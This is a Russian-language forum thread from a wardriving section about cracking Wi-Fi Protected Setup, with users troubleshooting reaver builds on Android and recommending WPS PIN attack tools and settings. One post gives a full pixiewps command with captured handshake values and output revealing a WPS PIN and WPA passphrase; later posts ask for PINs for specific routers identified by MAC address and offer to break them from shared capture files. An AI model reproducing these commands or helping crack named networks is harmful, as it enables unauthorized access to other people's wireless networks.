Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    По идее, компилировать также как под Linux, склонировать, cd reaver/src/, и make (и make install опционально).
     
  2. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    TOX1C, CRACK211 and binarymaster like this.
  3. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    уже ж вообще есть 1.6.3 версия...
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Слегка изменили формат вывода, теперь помещатся в 80 колонок стандартного терминала. :)

    Code:
    pixiewps -b 00:c0:ca:78:b1:37 -n 20:30:c1:b4:6c:15:94:74:3e:0b:78:e6:5d:ac:2e:61 -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -m 88:9a:a5:b1:51:72:7a:6d:c0:ba:d7:6e:99:a9:f0:1c -r a5:bf:83:3a:ed:90:ff:f9:07:6a:0c:76:eb:e4:c1:a5:a6:33:16:54:09:d4:cc:43:c6:e2:93:46:58:56:15:26:c9:e6:d5:fe:8e:2d:bf:ba:8c:14:9f:c9:a4:08:ce:f5:a0:09:41:a3:38:10:d7:0d:b2:ce:ea:f4:7e:87:f9:6d:3b:5e:cd:e1:12:e3:29:54:4c:d1:2e:2c:46:21:3f:63:52:e6:7f:35:13:1c:00:0b:70:d9:ef:c9:ee:2d:7c:37:91:28:a3:9d:53:ca:c9:53:c9:2a:b0:86:8e:6d:3a:d1:ad:d2:ac:09:ca:f2:ee:33:f0:5d:20:ae:06:6f:bf:a4:32:2e:3b:ee:1c:53:8c:7c:de:23:aa:1b:a9:a0:ec:ac:11:4f:fd:6d:9c:bf:c6:8d:53:0e:9d:0f:d7:8a:c1:25:4d:3b:9c:d6:91:ce:43:2b:cd:4d:cc:ca:c8:2a:80:6c:53:ed:45:34:00:05:e9:95:02:c5:5a:9c:a8:75:77:45 -7 0d:d8:fc:a1:20:9d:b2:c0:64:62:cd:0f:46:62:69:31:ce:4c:35:ff:e2:db:5f:0b:26:47:cf:74:9a:a8:47:f1:2c:b8:1f:3f:7d:66:98:75:78:e4:d6:24:bb:c7:d8:16:03:05:4e:8c:e4:b7:47:fe:f5:50:36:e6:8d:6f:17:3b:6b:fa:2f:4c:62:86:00:30:ce:06:39:ee:c6:8c:30:5a:7c:42:49:8d:e8:b9:75:03:f6:d7:b6:66:49:99:82:b2:5e:f1:28:b2:b4:0c:2b:8b:d6:f4:5e:ad:02:44:f9:34 --mode 3 -5 0d:d8:fc:a1:20:9d:b2:c0:64:62:cd:0f:46:62:69:31:fe:32:37:b0:c0:54:1c:ee:7f:f1:60:e3:c2:2c:1e:fa:18:7f:10:1b:8a:ca:a0:ce:ee:90:72:3e:d1:46:9c:7a:fc:7c:f2:b7:53:33:33:c6:94:44:7a:42:41:a1:6f:3a -s 28:5e:61:79:7f:46:be:06:96:27:77:27:8c:54:1f:8d:be:00:db:e2:85:9a:9b:66:e9:4e:f8:93:f0:96:e3:3e -z 45:75:5e:43:2b:18:33:dc:6e:0e:7e:a5:22:ac:0e:7d:ff:0a:f4:52:4d:57:04:30:ca:2f:50:02:66:45:c9:cf -v 3
    
     Pixiewps 1.3
    
     [?] Mode:     3 (RTL819x)
     [*] DHKey:    1c791f933498a1087116eae0da7724aa64e65181de5b09837d303c274bd6e6b4
     [*] KDK:      531c2b2a081eb66732784216317f52a9a2c0d440f0d740b9a976693174ab9d12
     [*] AuthKey:  97f39297f3962da3786dc3c481ddc2c890e85d811a1916c4e4e5b52997901580
     [*] EMSK:     6ad86b93248dc139ff6c8ba5c45e1dfa444602f02e1519995ae69cba23f8c3c0
     [*] KWKey:    fb847a17e1ff79eb5cfb5edeefb3e3dd
     [*] KWA:      adc4d2c64a3251e5
     [*] PSK1:     59f7e52a31d76d25d5a0fadd114447a0
     [*] PSK2:     235fc81033cf027e5ecd8b3316ac50d1
     [*] ES1:      0dd8fca1209db2c06462cd0f46626931
     [*] ES2:      0dd8fca1209db2c06462cd0f46626931
     [*] SSID:     11n AP
     [+] WPS pin:  07760891
     [+] WPA-PSK:  VeryS3curePassw0rd
    
     
    antis17, Payer and CRACK211 like this.
  5. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,047
    Likes Received:
    1,127
    Reputations:
    11
    Спасибо большое. reaver запускается, но дальше
    Waiting for beacon from дело не идёт (
     
    #4165 CRACK211, 17 Nov 2017
    Last edited: 17 Nov 2017
  6. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Проверил на xperia ray - работает нормально. Могу только посоветовать на android поставить linux deploy, там компиляция будет простой, как в инструкции к reaver написано.
     
  7. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,047
    Likes Received:
    1,127
    Reputations:
    11
    наверное что то не так с моим телефоном( потому что эта версия работает на моем телефоне 1,52 а 1,63 нет
     
    #4167 CRACK211, 17 Nov 2017
    Last edited: 17 Nov 2017
  8. maus

    maus Active Member

    Joined:
    30 May 2015
    Messages:
    410
    Likes Received:
    102
    Reputations:
    0
    - ну тогда самый дешёвый планшет с виндой + Waircut V1.5
     
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Странная у вас логика - если одна версия работает, то это уже проблема второй версии. Соберите pcap, и отправьте баг-репорт в репозиторий reaver. Возможно регрессия.

    И потом, когда исправлять начнут, придётся самим собирать и тестировать.
     
    #4169 binarymaster, 17 Nov 2017
    Last edited: 17 Nov 2017
  10. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Исправлять не надо ничего, билд хоть и запускается, но не работает. В эфире тишина, трубка ничего не передает. Скорее всего связано с нехваткой чего-то, что отвечает за дружбу с софтом из bcmon пакета.

    [​IMG]
     
    Veil, CRACK211 and binarymaster like this.
  11. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Ну да, под это дело они там чего то модифицируют - "we don't handle radiotap on packet injection. 'aireplay-ng' works fine with it but tools like 'reaver' seem to require it"
    На телефоне, на котором проверял, никакого bcmon нет.
     
    #4171 VasiliyP, 17 Nov 2017
    Last edited: 17 Nov 2017
  12. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Выше выложили тот бинарник, который работает нормально. Могу еще выложить тот libfake_driver, благодаря которому в программах с пакета airodump работает отображение силы сигнала. Хотя вряд ли дело только в нем. Возможно, там и с линковкой проблемы.
     
  13. roofless

    roofless New Member

    Joined:
    17 Nov 2017
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    здравствуйте. вижу, вы в этой теме активно пытались взломать точки RT-Wifi_xxxx предположительно от ZTE. Чем в итоге дело кончилось?
     
  14. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Алгоритм имплементирован в последнюю ночную сборку RS 2.59beta, работает на ура!
    Настройки выставить так:
    Check PINs in the list
    Don't calculate checksums
    В поле PINS поставить один пустой пин (нажать Enter)
     
    Kakoluk, ewgen24, Alvinng and 2 others like this.
  15. kupatik

    kupatik New Member

    Joined:
    29 Nov 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Зрузья.Помогите с пинами.c0:4a:00:da:18:58 (tp-link).И 00:0e:8f:69:4d:07 (sercomm).Особо интересен tp-link.Wps werden уже пробывал.Генератор тоже не помог.
     
  16. Andrey9999

    Andrey9999 Elder - Старейшина

    Joined:
    23 May 2012
    Messages:
    3,259
    Likes Received:
    32,339
    Reputations:
    73
    С tp-link'ами можете не заморачиваться
     
  17. ewgen24

    ewgen24 Member

    Joined:
    20 Jan 2016
    Messages:
    14
    Likes Received:
    10
    Reputations:
    0
    а хендшейк пробовали ловить на tp-link?
     
  18. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Если кто выкладывал в тему подбора паролей хендшейк c TP-LINK, прошло не менее недели, без результата. Если включен wps, могу попрбовать помочь его сломать при помощи airserv-ng. Для начала выкладывайте сюда ссылку на cap файл, нужно посмотреть, в каком состоянии wps. Один человек.
     
    hydra, kuz and henri2002 like this.
  19. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,335
    Likes Received:
    36,384
    Reputations:
    67
    http://rgho.st/76flBhvs9
    Очень интересно.Прям интрига!
     
  20. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Личку посмотрите.